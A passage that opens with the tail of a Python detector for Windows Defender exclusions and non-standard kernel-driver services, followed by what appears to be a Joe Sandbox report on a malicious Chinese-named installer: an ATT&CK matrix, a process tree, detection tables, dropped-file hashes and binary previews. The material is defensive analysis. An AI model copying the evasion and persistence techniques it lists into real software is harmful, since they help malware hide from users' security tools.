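def check_kernel_service(cmdline: str) -> List[str]:
    """Flag `sc create ... type= kernel` unless the image is a .sys file in
    System32\\drivers; a .dll-named driver under Program Files, as in this
    report, is the case this catches."""
    m = SC_CREATE_RE.search(cmdline)
    t = TYPE_RE.search(cmdline)
    if not m or not t or t.group(1).lower() != "kernel":
        return []
    b = BINPATH_RE.search(cmdline)
    image = (b.group(1) or b.group(2)) if b else ""
    low = image.lower()
    if low.endswith(".sys") and "\\system32\\drivers\\" in low:
        return []
    return [f"high: kernel service {m.group(1)} registered with image {image}"]


def scan(events: List[Dict[str, str]]) -> List[str]:
    findings: List[str] = []
    for ev in events:
        cl = ev.get("CommandLine", "")
        findings += check_defender_exclusion(cl) + check_kernel_service(cl)
    return findings


if __name__ == "__main__":
    for line in scan(EVENTS):
        print(line)
```

The kernel-service check deliberately keys on the image path rather than the service name: CleverSoar is specific to this sample, while a driver registered from outside System32\drivers is a pattern that survives renaming.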
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Code function: 8_2_6C3B7720 cpuid
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (3 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exe ; Code function: 11_2_0097AB2A GetSystemTimeAsFileTime
Source: C:\Program Files (x86)\Windows NT\7zr.exe ; Code function: 11_2_00A10090 GetVersion
MITRE ATT&CK Matrix

The matrix is flattened in the source and is rebuilt here one tactic per line, with the techniques in the order their cells appear. A leading number is the count badge the report draws on a matched technique, reproduced as rendered; entries without one are the matrix's unmatched placeholders.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Command and Scripting Interpreter; 1 Service Execution; 1 Native API; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 Windows Service; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Access Token Manipulation; 1 Windows Service; 111 Process Injection; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 231 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 1 System Time Discovery; 421 Security Software Discovery; 231 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; 2 System Owner/User Discovery; 3 File and Directory Discovery; 25 System Information Discovery; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Encrypted Channel; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 1580230 Sample: #U5b89#U88c5#U52a9#U624b1.0.3.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 88
97 Multi AV Scanner detection for dropped file 2->97
99 Multi AV Scanner detection for submitted file 2->99
101 Found driver which could be used to inject code into processes 2->101
103 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->103
11 #U5b89#U88c5#U52a9#U624b1.0.3.exe 2 2->11 started
14 cmd.exe 2->14 started
16 cmd.exe 2->16 started
18 26 other processes 2->18
process3 file4
95 C:\...\#U5b89#U88c5#U52a9#U624b1.0.3.tmp, PE32 11->95 dropped
20 #U5b89#U88c5#U52a9#U624b1.0.3.tmp 3 5 11->20 started
24 sc.exe 1 14->24 started
26 sc.exe 1 16->26 started
28 sc.exe 1 18->28 started
30 sc.exe 1 18->30 started
32 sc.exe 1 18->32 started
34 22 other processes 18->34
process5 file6
81 C:\Users\user\AppData\Local\...\update.vac, PE32 20->81 dropped
83 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 20->83 dropped
105 Adds a directory exclusion to Windows Defender 20->105
36 #U5b89#U88c5#U52a9#U624b1.0.3.exe 2 20->36 started
39 powershell.exe 23 20->39 started
42 conhost.exe 24->42 started
44 conhost.exe 26->44 started
46 conhost.exe 28->46 started
48 conhost.exe 30->48 started
50 conhost.exe 32->50 started
52 conhost.exe 34->52 started
54 21 other processes 34->54
signatures7 process8 file9
85 C:\...\#U5b89#U88c5#U52a9#U624b1.0.3.tmp, PE32 36->85 dropped
56 #U5b89#U88c5#U52a9#U624b1.0.3.tmp 4 16 36->56 started
107 Loading BitLocker PowerShell Module 39->107
60 conhost.exe 39->60 started
62 WmiPrvSE.exe 39->62 started
signatures10 process11 file12
87 C:\Users\user\AppData\Local\...\update.vac, PE32 56->87 dropped
89 C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32 56->89 dropped
91 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 56->91 dropped
93 C:\Program Files (x86)\Windows NT\7zr.exe, PE32 56->93 dropped
109 Query firmware table information (likely to detect VMs) 56->109
111 Protects its processes via BreakOnTermination flag 56->111
113 Hides threads from debuggers 56->113
115 Contains functionality to hide a thread from the debugger 56->115
64 7zr.exe 2 56->64 started
67 cmd.exe 56->67 started
69 7zr.exe 7 56->69 started
signatures13 process14 file15
79 C:\Program Files (x86)\...\tProtect.dll, PE32+ 64->79 dropped
71 conhost.exe 64->71 started
73 sc.exe 1 67->73 started
75 conhost.exe 69->75 started
process16 process17
77 conhost.exe 73->77 started



Source | Detection | Scanner | Label | Link
#U5b89#U88c5#U52a9#U624b1.0.3.exe | 7% | Virustotal | | Browse
#U5b89#U88c5#U52a9#U624b1.0.3.exe | 0% | ReversingLabs | |

Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs | |
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | Virustotal | | Browse
C:\Program Files (x86)\Windows NT\hrsw.vbc | 15% | Virustotal | | Browse
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs | |
C:\Program Files (x86)\Windows NT\tProtect.dll | 6% | Virustotal | | Browse
C:\Users\user\AppData\Local\Temp\is-1K545.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\is-7TRUA.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.214.172 | true | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | #U5b89#U88c5#U52a9#U624b1.0.3.exe | false | | high
https://www.remobjects.com/ps | #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124811659.000000007EE4B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124372052.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000000.2126329450.0000000000821000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000000.2215420602.00000000005ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.7.dr | false | | high
https://www.innosetup.com/ | #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124811659.000000007EE4B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124372052.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000000.2126329450.0000000000821000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000008.00000000.2215420602.00000000005ED000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr, #U5b89#U88c5#U52a9#U624b1.0.3.tmp.7.dr | false | | high
          No contacted IP infos
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1580230
          Start date and time:2024-12-24 05:02:15 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 10m 5s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Run with higher sleep bypass
          Number of new started processes analysed:102
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Critical Process Termination
          Sample name:#U5b89#U88c5#U52a9#U624b1.0.3.exe
          renamed because original name is a hash value
          Original Sample Name:1.0.3.exe
          Detection:MAL
          Classification:mal88.evad.winEXE@116/33@0/0
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 77%
          • Number of executed functions: 28
          • Number of non-executed functions: 77
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
          • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe, backgroundTaskHost.exe
          • Excluded IPs from analysis (whitelisted): 20.190.147.0, 13.107.246.63, 4.175.87.197
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, login.live.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes were analyzed; report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          No simulations
          No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
bg.microsoft.map.fastly.net | eCompleted_419z.pdf | Get hash | malicious | Unknown | Browse | 199.232.210.172
| Onboard Training Checklist v1.1 - Wyatt Young (1).xlsx | Get hash | malicious | Unknown | Browse | 199.232.214.172
| 94e.exe | Get hash | malicious | Remcos | Browse | 199.232.214.172
| https://liladelman.com/rental/1218-west-side-road-block-island/ | Get hash | malicious | Unknown | Browse | 199.232.210.172
| 7q551ugrWe.exe | Get hash | malicious | UltraVNC | Browse | 199.232.210.172
| T8xrZb7nBL.exe | Get hash | malicious | UltraVNC | Browse | 199.232.210.172
| Olz7TmvkEW.exe | Get hash | malicious | UltraVNC | Browse | 199.232.214.172
| mSRW5AfJpC.exe | Get hash | malicious | UltraVNC | Browse | 199.232.214.172
| q8b3OisMC4.dll | Get hash | malicious | Unknown | Browse | 199.232.210.172
| 7q551ugrWe.exe | Get hash | malicious | UltraVNC | Browse | 199.232.210.172
          No context
          No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U52a9#U624b1.0.2.exe | Get hash | malicious | Unknown | Browse |
| #U5b89#U88c5#U52a9#U624b1.0.1.exe | Get hash | malicious | Unknown | Browse |
| #U5b89#U88c5#U52a9#U624b1.0.2.exe | Get hash | malicious | Unknown | Browse |
| #U5b89#U88c5#U52a9#U624b1.0.2.exe | Get hash | malicious | Unknown | Browse |
| #U5b89#U88c5#U52a9#U624b_2.0.8.exe | Get hash | malicious | Unknown | Browse |
| #U5b89#U88c5#U52a9#U624b1.0.2.exe | Get hash | malicious | Unknown | Browse |
| #U5b89#U88c5#U52a9#U624b_2.0.8.exe | Get hash | malicious | Unknown | Browse |
| #U5b89#U88c5#U52a9#U624b_2.0.6.exe | Get hash | malicious | Unknown | Browse |
| #U5b89#U88c5#U52a9#U624b_2.0.6.exe | Get hash | malicious | Unknown | Browse |
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):831200
                            Entropy (8bit):6.671005303304742
                            Encrypted:false
                            SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                            MD5:84DC4B92D860E8AEA55D12B1E87EA108
                            SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                            SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                            SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            • Antivirus: Virustotal, Detection: 0%, Browse
                            Joe Sandbox View:
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.1.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.8.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious, Browse
                            • Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):2054096
                            Entropy (8bit):7.999911973951703
                            Encrypted:true
                            SSDEEP:49152:1Z9WsDkMA2WvV8z2sg8QfBFPLhxaUAdUwRhB5akR2zrvkOWCgUc:1Z8s9A/QghFzWd37B5RIrY7h
                            MD5:310C3D7BE8A2AE42D4AB349F9F46F46C
                            SHA1:82A78D2C76591A09B354C51E1A2BCF73AD8A4FD8
                            SHA-256:20969AD745814479F39CECD7725608821A07D4E5299DCEDC74642604E6481B9E
                            SHA-512:2091FC678994C30ACED6105A5D006B1EA7B6B683AF6B723F88AB65B30701174A36B9BA7730E6DD912E88F1781BFEC0F0D9AD7B526191BC214A2D87D5EBA5EE5C
                            Malicious:false
                            Preview:.@S.....6...................!Z...;o..!5.G3...?.... ......i....v...p......*]..b....l...J..J?.. .5...m.u......]............%;..L......'..@.Mt....-......x.{.D.8".Nnn6C.bh*S}y..Z?21*B.....WUCrz.+.<#.W.B/.1.j:...%..+..M]..w...t.^...zb.o..c.(.........K..|j..}>.ciK...Z..k.T..co....}..m:.+A.F...;...JT....]...[....>W...2......8..~s0.Dj...........K.+Is..{.v:.......!...].....g7..EDf+G.....w.+.Y.m.z..).7..?%..{d.Y.&.)s..+bH..+..P'.$..gS*h....G...1|{..t...y.m.9...3m...u..|.e...PVC3..T\....-....._(.K....I.l.;+...Y;*.....9Gj..9..h..kwA.8........bf.)\..0..N..VE.bX.>#.....i..._..U..x....m......pE..e%......l.kY..a.Y1$..z..5._NPB.<...w......(.>30U.........%...._.X....zd..[.{...A.U....3...:..t..._l\{.|}&.../.U..4}:.-...%(.'sZabL..t8...j..9.),....N.yP....a...~&1........fDS5...7.z$6...... .[I]........9..S.7_...y.d.6... .M..z...az..8...+?._..ib...M...^P}vM3...\!..;.O.}...*... Zp#)..r..l.#..3...F.K..B..2kbr.....y..:.=...\. ........`Z..u.R....8...c..e.f.T
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606528
                            Entropy (8bit):7.005604268954487
                            Encrypted:false
                            SSDEEP:98304:yLVLAJG42oakQdhme71MzSRTP/Se7NHaV:yZyTFaOe71MzSP/Se75g
                            MD5:1047AF726D2E233D71934EF55E635C4A
                            SHA1:AB12E827E4E57DEA2E885733F0C48E9A83756678
                            SHA-256:42934349F3C8D0EE1CD121B8386A5A6D28D7E8E54A251AE18AA0992D5897EC44
                            SHA-512:8A26268641B1B3F54ABE04CA2212FCA8BCCBD575DCDAB38F7E921FE9E01C29B99BCE25913642E658027A47E27AED795DD5FF3EF9DDC1077108BE29210052AF7E
                            Malicious:true
                            Antivirus:
                            • Antivirus: Virustotal, Detection: 15%, Browse
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%.........................................7...........@.........................HC.......J..<....07.X....................@7.$?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................8Tk....p.....(......"(............. ..`.rsrc...X....07.......6.............@..@.reloc..$?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):1803979
                            Entropy (8bit):7.999882930255694
                            Encrypted:true
                            SSDEEP:49152:ZU4rm4ToT3YZyQXl/kpD0EClXO9XQv5y9wNz:ZpCcJl/k6k9gvfNz
                            MD5:120881F751D8AC3C5ABE1FED5EFAD2AE
                            SHA1:DDB9BDACE6DE20213B844BE9E1FE67B475660455
                            SHA-256:30877048AFCE36333CEFC1E52079DDA43FEB7412F59B5AF132EBF2F3BB710D29
                            SHA-512:EE8B6E2A25F1F94D460502884C03F118DE8D08AB25C31ACEE987C0D16ED69910F4A1D6B785162FBAB5D4DB1AE09F556117C5895D9FDABC2BC766B324B9E54E41
                            Malicious:false
                            Preview:V.y.(.P.U..%...A{...&i.&..8.;...?....R.........*..o...r...*.r........F..~.5XoZ.4...$.. ..>n....[F..=.V...2M?.c.x..5...Y....".s.g.Y..F..3../Q.={!BO.Kz`.8\z...2.g..Z].ZY.};./.c..=.<Um{1...3.3(.....%4...a/.E3..5<..&..U.K;..yD5....d............g.;..8.......v?.Ib...v..J......W...?<.~w..&........c...H...R..vo.Da.3.H.".Y.8.q...B....l\R.D.L...J'G.... .f.K#..Q'.x.Wj....b..v...g..&.o@=.p..j.......h#.......r..!.....Ga.2..4.'f......{.a......D..m.i.+OiG...W.....B...>&..R_.(.ur.x..e....<.e...p.*....%..y4..j.....fP#....%.v.-..}...w......'. ..J.}..H..~!K.#..v4....EX.X3...>.o...0Hw^...t..X....+..S.F.5...E.la....d..R...D.-..hx6....'..PF....*).h....Qq..VU..~..Qi..c-.E.......V..c~N..X...OO.V.. H.....5U...[B.3..N?.0....#.....;.v....2.Y............f..A..v.Z.t:....n.v.UE.A.c.@.d..L.)...l...[....U.kw.B.l...S..E.......[..V..$C%..|KK..=..r..N*.t.G....&.].X.Q...:..k.........h..../N4...C$..t.V.x..t..p.......H@.....(.s8v..I...}`A...)f..%...._[.Z..#S.F..v|.I].....
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):2054096
                            Entropy (8bit):7.999911973951703
                            Encrypted:true
                            SSDEEP:49152:1Z9WsDkMA2WvV8z2sg8QfBFPLhxaUAdUwRhB5akR2zrvkOWCgUc:1Z8s9A/QghFzWd37B5RIrY7h
                            MD5:310C3D7BE8A2AE42D4AB349F9F46F46C
                            SHA1:82A78D2C76591A09B354C51E1A2BCF73AD8A4FD8
                            SHA-256:20969AD745814479F39CECD7725608821A07D4E5299DCEDC74642604E6481B9E
                            SHA-512:2091FC678994C30ACED6105A5D006B1EA7B6B683AF6B723F88AB65B30701174A36B9BA7730E6DD912E88F1781BFEC0F0D9AD7B526191BC214A2D87D5EBA5EE5C
                            Malicious:false
                            Preview:.@S.....6...................!Z...;o..!5.G3...?.... ......i....v...p......*]..b....l...J..J?.. .5...m.u......]............%;..L......'..@.Mt....-......x.{.D.8".Nnn6C.bh*S}y..Z?21*B.....WUCrz.+.<#.W.B/.1.j:...%..+..M]..w...t.^...zb.o..c.(.........K..|j..}>.ciK...Z..k.T..co....}..m:.+A.F...;...JT....]...[....>W...2......8..~s0.Dj...........K.+Is..{.v:.......!...].....g7..EDf+G.....w.+.Y.m.z..).7..?%..{d.Y.&.)s..+bH..+..P'.$..gS*h....G...1|{..t...y.m.9...3m...u..|.e...PVC3..T\....-....._(.K....I.l.;+...Y;*.....9Gj..9..h..kwA.8........bf.)\..0..N..VE.bX.>#.....i..._..U..x....m......pE..e%......l.kY..a.Y1$..z..5._NPB.<...w......(.>30U.........%...._.X....zd..[.{...A.U....3...:..t..._l\{.|}&.../.U..4}:.-...%(.'sZabL..t8...j..9.),....N.yP....a...~&1........fDS5...7.z$6...... .[I]........9..S.7_...y.d.6... .M..z...az..8...+?._..ib...M...^P}vM3...\!..;.O.}...*... Zp#)..r..l.#..3...F.K..B..2kbr.....y..:.=...\. ........`Z..u.R....8...c..e.f.T
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):56530
                            Entropy (8bit):7.9968380149923775
                            Encrypted:true
                            SSDEEP:1536:eIJEBB8fJtUFlKiedDsLrObUvIjwBlnoL8AE:rEBBGiwDwE83
                            MD5:6520FCCCF7582751CB5C0EDA1135F0CE
                            SHA1:8F2F62DDF46BB755B927879E5F306D87EE366628
                            SHA-256:7682005B326053CDB2DB5728AA8E41A27216379407C1CFBE616FBA3E8ECAF660
                            SHA-512:2907078ED6E68183C38C15000F65696D25AACBAC1172BFB599EDAAEA992A7789E0D087DC1AD0B789B51C699A31AD8F3D624466532706C822C191EC2889FBC91C
                            Malicious:false
                            Preview:.@S.......N| .................]..|.1....M."..Fc..m..0...y=.a..A.!.....}1...<yk......I.#......j...^+#...G.Q./-.?:;=.m..8%.FO..<q..$..1....(.bf..TS....J&..c...........2z..8.|...).......c...R......Z..f.4`.....0=1$..]<<C..UVy).......>..........i..>...,....q..u.<...{.~g.,..N....u.8..!.;..p......6.1.....*.rG..!..I@..;..~c..l....V.P..YS.....,Gg.T...q....7p.Z`.r......*....:F.E..%..K+.%hEE.J......l..i_..CR....a..^....kQ.i......$..(.d.V.M;YX..|."..C.4..G...F....-...p..%..Ip.r....a.y.....W....$....kd...2.z6o..e....... I.@..)A.WL<..z.WsM;........0pfA.m....{.M......K...'.......>.......[.gO......H....+.#.,...7N:..l|.Zg......l.+....a...t.]./.?.Kv..m.........Bq..~.YP?N7.+P3....k...E.......?..<l...!S.4..N.8......#?@)...?M.\C.rUi.F.<...p.R.p~.'..c..'S..t v.g....X....h.W.I....P..U.'..oJ.'.-.{?.._....W....0.+N.+.P.vwF..\/..-{.%..e].q.=.@.|.@.B.\.."......X....@..^..F.c...@7..T.....1...k!.1[.!.D.............-......Q.........<.._/s9n&..78....V..p.C
                            Process:C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):56530
                            Entropy (8bit):7.996838014992376
                            Encrypted:true
                            SSDEEP:768:3+wwYQzmSwBLGw8b95CEHJGDARzCh+7poOvotI0NtK+pfrNPnnsYa+7VyzlKx6qK:3SjMN2JGD6eRy21jNPnsYsRT9VN
                            MD5:7298ADFBE18EAEBBFFAF9733A10E1579
                            SHA1:49CE3A1424E05114FAD9A68035C6BDEC1EB4062C
                            SHA-256:3AADE7040A0D5452FA649088C6B3E1629457B0BC741A390F12BF6BDEBC892CD8
                            SHA-512:37B3BF7ECFC05FED760181B64F8F66E16024B9926F4F3888C6BD5CDFA94F35D92598E5DBD312FE741118302861628AC8E411585C68B8A5B819251FC46EE9FDF6
                            Malicious:false
